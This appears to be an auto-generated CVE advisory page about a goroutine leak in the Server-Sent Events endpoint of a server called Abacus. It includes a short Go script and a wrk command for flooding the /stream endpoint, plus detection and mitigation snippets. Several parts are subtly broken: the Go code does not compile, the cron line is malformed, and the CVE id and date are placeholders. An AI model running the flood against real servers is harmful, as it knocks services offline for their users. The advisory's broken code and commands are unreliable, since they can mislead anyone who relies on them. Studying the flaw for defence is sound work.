Abacus, Goroutine Leak, CVE-XXXX-XXXX (Critical)

By /

How the CVE Works:

The vulnerability arises in Abacus’s Server-Sent Events (SSE) implementation due to improper handling of client disconnections. When a client disconnects from the `/stream` endpoint, the server fails to clean up the associated goroutines and channels. This results in blocked goroutines that remain in memory indefinitely, leading to resource exhaustion. Over time, the server’s memory usage stabilizes at a high level, preventing new SSE connections while other endpoints remain functional. The issue is exacerbated in high-traffic environments where frequent client connections and disconnections occur, causing a denial of service for SSE functionality.

DailyCVE Form:

Platform: Abacus

Version: < v1.4.0

Vulnerability: Goroutine leak

Severity: Critical

Date: YYYY-MM-DD

What Undercode Say:

Exploitation:

1. Exploit Code:

package main
import (
"net/http"
"time"
)
func main() {
for {
go func() {
resp, _ := http.Get("http://target/stream")
defer resp.Body.Close()
time.Sleep(1 time.Second)
}()
time.Sleep(100 time.Millisecond)
}
}

This script repeatedly connects and disconnects to the `/stream` endpoint, triggering the goroutine leak.

2. Exploit Command:

Use a load testing tool like `wrk` to simulate high traffic:

wrk -t10 -c100 -d60s http://target/stream

3. Detection:

Monitor memory usage and goroutine count:

curl http://target/debug/pprof/goroutine?debug=2

Protection:

1. Upgrade:

Upgrade to Abacus v1.4.0 or later.

2. Workaround Commands:

  • Limit connections using Nginx: 
    location /stream {
proxy_pass http://abacus;
proxy_set_header Connection "";
proxy_http_version 1.1;
proxy_buffering off;
limit_conn addr 100;
}
  • Set timeouts: 
    timeout 300 curl http://target/stream

3. Monitoring:

Use Prometheus to track memory and goroutine metrics:

- job_name: 'abacus'
static_configs:
- targets: ['target:9090']

4. Restart Script:

Schedule regular restarts using cron:

0 /6 systemctl restart abacus

5. References:

By following these steps, you can exploit, detect, and protect against this critical vulnerability.

References:

Reported By: https://github.com/advisories/GHSA-vh64-54px-qgf8
Extra Source Hub:
Undercode

Image Source:

Undercode AI DI v2Featured Image

Scroll to Top